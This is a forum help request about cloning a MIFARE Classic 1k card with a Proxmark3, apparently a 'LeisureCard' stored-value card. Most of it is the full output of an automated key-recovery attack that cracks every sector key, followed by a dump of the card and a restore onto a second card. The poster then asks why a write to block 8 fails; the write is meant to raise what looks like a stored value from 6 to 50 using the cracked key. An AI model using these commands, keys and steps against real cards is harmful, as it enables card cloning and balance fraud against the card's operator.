Hello,
I’m trying to do two things:
-
Clone a MIFARE Classic 1k card, but I’m not sure if I’m doing it correctly as I’m getting an error.
-
Trying to edit the value of a block, but I keep getting an Auth error.
- This is the commands I’m running in this order:
[usb] pm3 → hf mf autopwn
[!] No known key was supplied, key recovery might fail
[+] loaded 5 user keys
[+] loaded 61 hardcoded keys
[=] Running strategy 1
[=] …
[=] Running strategy 2
[=] …
[+] Target sector 0 key type A – found valid key [ A0A1A2A3A4A5 ] (used for nested / hardnested attack)
[+] Target sector 1 key type A – found valid key [ A0A1A2A3A4A5 ][+] Target block 0 key type B
[-] Nested attack failed, trying again (1/6)
[+] Target block 0 key type B
[-] Nested attack failed, trying again (2/6)
[+] Found 1 key candidate
[+] Target block 0 key type B – found valid key [ 988C940B0BB8 ]
[+] Target sector 0 key type B – found valid key [ 988C940B0BB8 ][+] Found 1 key candidate
[+] Target block 4 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 1 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 4 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 5 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 6 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 7 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 8 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 9 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 10 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 11 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 12 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 13 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 14 key type B – found valid key [ 8D89AB80500D ]
[+] Target sector 15 key type B – found valid key [ 8D89AB80500D ][+] Target block 8 key type A
[-] Nested attack failed, trying again (1/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (2/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (3/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (4/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (5/6)
[+] Target block 8 key type A
[-] Nested attack failed, trying again (6/6)
[+] Target block 8 key type A
[-] Nested attack failed, moving to hardnested[=] ---------±--------±--------------------------------------------------------±----------------±------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------±--------±--------------------------------------------------------±----------------±------
[=] 0 | 0 | Start using 8 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 1231 million (2^30.2) keys/s | 140737488355328 | 32h
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 3266 ms | 140737488355328 | 32h
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 32h
[=] 7 | 112 | Apply bit flip properties | 103574749184 | 84s
[=] 8 | 224 | Apply bit flip properties | 34574442496 | 28s
[=] 8 | 335 | Apply bit flip properties | 18684311552 | 15s
[=] 9 | 447 | Apply bit flip properties | 17186537472 | 14s
[=] 10 | 559 | Apply bit flip properties | 15895958528 | 13s
[=] 11 | 671 | Apply bit flip properties | 15555934208 | 13s
[=] 12 | 783 | Apply bit flip properties | 15555934208 | 13s
[=] 12 | 890 | Apply bit flip properties | 15555934208 | 13s
[=] 13 | 1002 | Apply bit flip properties | 15555934208 | 13s
[=] 14 | 1110 | Apply bit flip properties | 15555934208 | 13s
[=] 15 | 1221 | Apply bit flip properties | 15555934208 | 13s
[=] 15 | 1329 | Apply bit flip properties | 15555934208 | 13s
[=] 16 | 1438 | Apply bit flip properties | 15555934208 | 13s
[=] 17 | 1548 | Apply bit flip properties | 15555934208 | 13s
[=] 19 | 1660 | Apply Sum property. Sum(a0) = 128 | 1178639872 | 1s
[=] 20 | 1770 | Apply bit flip properties | 1178639872 | 1s
[=] 21 | 1872 | Apply bit flip properties | 1178639872 | 1s
[=] 22 | 1982 | Apply bit flip properties | 1178639872 | 1s
[=] 22 | 1982 | (Ignoring Sum(a8) properties) | 1178639872 | 1s
[=] 24 | 1982 | Brute force phase completed. Key found: 9FA570FA1A97 | 0 | 0s
[=] ---------±--------±--------------------------------------------------------±----------------±------
[+] Target sector 2 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 3 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 4 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 5 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 6 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 7 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 8 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 9 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 10 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 11 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 12 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 13 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 14 key type A – found valid key [ 9FA570FA1A97 ]
[+] Target sector 15 key type A – found valid key [ 9FA570FA1A97 ][=] ---------±--------±--------------------------------------------------------±----------------±------
[=] | | | Expected to brute force
[=] Time | #nonces | Activity | #states | time
[=] ---------±--------±--------------------------------------------------------±----------------±------
[=] 0 | 0 | Start using 8 threads and AVX2 SIMD core | |
[=] 0 | 0 | Brute force benchmark: 1315 million (2^30.3) keys/s | 140737488355328 | 30h
[=] 3 | 0 | Loaded 0 RAW / 351 LZ4 / 0 BZ2 in 3125 ms | 140737488355328 | 30h
[=] 3 | 0 | Using 239 precalculated bitflip state tables | 140737488355328 | 30h
[=] 7 | 112 | Apply bit flip properties | 3041197293568 | 39min
[=] 7 | 221 | Apply bit flip properties | 866465873920 | 11min
[=] 8 | 333 | Apply bit flip properties | 851320569856 | 11min
[=] 9 | 444 | Apply bit flip properties | 595516588032 | 8min
[=] 10 | 552 | Apply bit flip properties | 580852973568 | 7min
[=] 11 | 664 | Apply bit flip properties | 580338057216 | 7min
[=] 12 | 773 | Apply bit flip properties | 580338057216 | 7min
[=] 13 | 885 | Apply bit flip properties | 580338057216 | 7min
[=] 13 | 997 | Apply bit flip properties | 580338057216 | 7min
[=] 14 | 1109 | Apply bit flip properties | 580338057216 | 7min
[=] 14 | 1221 | Apply bit flip properties | 580338057216 | 7min
[#] AcquireEncryptedNonces: Auth1 error
[=] 15 | 1330 | Apply bit flip properties | 580338057216 | 7min
[=] 16 | 1442 | Apply bit flip properties | 580338057216 | 7min
[=] 18 | 1549 | Apply Sum property. Sum(a0) = 192 | 35749797888 | 27s
[=] 18 | 1655 | Apply bit flip properties | 35749797888 | 27s
[=] 19 | 1766 | Apply bit flip properties | 35749797888 | 27s
[=] 20 | 1874 | Apply bit flip properties | 20103917568 | 15s
[=] 20 | 1984 | Apply bit flip properties | 48540049408 | 37s
[=] 21 | 2096 | Apply bit flip properties | 48540049408 | 37s
[=] 22 | 2201 | Apply bit flip properties | 48540049408 | 37s
[=] 23 | 2312 | Apply bit flip properties | 48540049408 | 37s
[=] 24 | 2312 | (1. guess: Sum(a8) = 256) | 48540049408 | 37s
[=] 24 | 2312 | Apply Sum(a8) and all bytes bitflip properties | 47577903104 | 36s
[=] 24 | 2312 | (2. guess: Sum(a8) = 192) | 194851487744 | 2min
[=] 24 | 2312 | Apply Sum(a8) and all bytes bitflip properties | 191847432192 | 2min
[=] 24 | 2312 | (3. guess: Sum(a8) = 128) | 297802924032 | 4min
[=] 27 | 2312 | Apply Sum(a8) and all bytes bitflip properties | 34374225920 | 26s
[=] 32 | 2312 | Brute force phase: 74.84% | 30280030208 | 23s
[=] 34 | 2312 | (4. guess: Sum(a8) = 160) | 41970249728 | 32s
[=] 35 | 2312 | Apply Sum(a8) and all bytes bitflip properties | 12321203200 | 9s
[=] 35 | 2312 | Brute force phase completed. Key found: D88C27DFC37E | 0 | 0s
[=] ---------±--------±--------------------------------------------------------±----------------±------
[+] Target sector 2 key type B – found valid key [ D88C27DFC37E ]
[+] Target sector 3 key type B – found valid key [ D88C27DFC37E ][+] -----±----±-------------±–±-------------±—
[+] Sec | Blk | key A |res| key B |res
[+] -----±----±-------------±–±-------------±—
[+] 000 | 003 | A0A1A2A3A4A5 | D | 988C940B0BB8 | N
[+] 001 | 007 | A0A1A2A3A4A5 | D | 8D89AB80500D | N
[+] 002 | 011 | 9FA570FA1A97 | H | D88C27DFC37E | H
[+] 003 | 015 | 9FA570FA1A97 | R | D88C27DFC37E | R
[+] 004 | 019 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 005 | 023 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 006 | 027 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 007 | 031 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 008 | 035 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 009 | 039 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 010 | 043 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 011 | 047 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 012 | 051 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 013 | 055 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 014 | 059 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] 015 | 063 | 9FA570FA1A97 | R | 8D89AB80500D | R
[+] -----±----±-------------±–±-------------±—
[=] ( D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA )
[?] Hint: MAD key detected. Tryhf mf madfor more details[+] Generating binary key file
[+] Found keys have been dumped toC:\ProxSpace\pm3/hf-mf-CD30EEB4-key.bin
[=] –[ FFFFFFFFFFFF ]– has been inserted for unknown keys where res is 0
[=] Transferring keys to simulator memory ( ok )
[=] Dumping card content to emulator memory (Cmd Error: 04 can occur)
[=] downloading card content from emulator memory
[+] Saved 1024 bytes to binary fileC:\ProxSpace\pm3/hf-mf-CD30EEB4-dump.bin
[+] Saved to json file C:\ProxSpace\pm3/hf-mf-CD30EEB4-dump.json
[=] Autopwn execution time: 91 seconds
Then to clone the dump to a new card I’ve ran the below:
[usb] pm3 → hf mf restore --1k --uid CD30EEB4 -k hf-mf-CD30EEB4-key.bin
[+] Loaded binary key filehf-mf-CD30EEB4-key.bin
[+] Loaded 1024 bytes from binary filehf-mf-CD30EEB4-dump.bin[=] blk | data | status
[=] -----±------------------------------------------------±---------------
[=] 0 | CD 30 EE B4 A7 08 04 00 01 DB C6 4D 3D 5C 42 1D | ( fail ) key B
[=] 0 | CD 30 EE B4 A7 08 04 00 01 DB C6 4D 3D 5C 42 1D | ( fail ) key A
[=] 1 | 48 00 04 00 00 D0 02 D0 02 00 02 00 02 00 02 00 | ( ok )
[=] 2 | 02 00 02 00 02 00 02 00 02 00 02 00 02 00 02 00 | ( ok )
[=] 3 | A0 A1 A2 A3 A4 A5 78 77 88 C1 98 8C 94 0B 0B B8 | ( ok )
[=] 4 | CA 33 30 33 35 35 30 38 39 34 31 0B 4C 65 69 73 | ( ok )
[=] 5 | 75 72 65 43 61 72 64 47 4C 65 69 73 75 72 65 00 | ( ok )
[=] 6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 7 | A0 A1 A2 A3 A4 A5 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 8 | 06 00 00 00 F9 FF FF FF 06 00 00 00 08 F7 08 F7 | ( ok )
[=] 9 | 11 6E 14 59 0C 60 00 86 18 00 11 00 00 00 00 00 | ( ok )
[=] 10 | 13 93 55 81 34 F3 93 55 81 05 6C 94 59 0C 61 00 | ( ok )
[=] 11 | 9F A5 70 FA 1A 97 68 77 89 00 D8 8C 27 DF C3 7E | ( ok )
[=] 12 | 00 00 00 00 FF FF FF FF 00 00 00 00 0C F3 0C F3 | ( ok )
[=] 13 | 11 6E 14 59 0C 60 00 86 18 00 11 00 00 00 00 00 | ( ok )
[=] 14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 15 | 9F A5 70 FA 1A 97 68 77 89 00 D8 8C 27 DF C3 7E | ( ok )
[=] 16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 19 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 23 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 27 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 29 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 31 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 32 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 33 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 34 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 35 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 36 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 37 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 38 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 39 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 41 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 42 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 43 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 44 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 45 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 46 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 47 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 48 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 49 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 51 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 52 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 53 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 54 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 55 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 56 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 57 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 58 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 59 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] 60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 61 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 62 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ( ok )
[=] 63 | 9F A5 70 FA 1A 97 78 77 88 00 8D 89 AB 80 50 0D | ( ok )
[=] -----±------------------------------------------------±---------------[?] Hint: Try
hf mf dump --nsto verify
[=] Done!
But you can see on the first two lines for block 0 fail, is this normal and have I done everything correct?
I’d like to change the value of block 8 which is currently:
06000000F9FFFFFF0600000008F708F7
to
32000000CDFFFFFF3200000008F708F7
I’ve tried running the below command on the card I’ve just written to, but I keep getting an Auth Error.
hf mf wrbl --blk 8 -a -k 9FA570FA1A97 -d 32000000CDFFFFFF3200000008F708F7
Any help on both issues would be much appreciated. Thank you.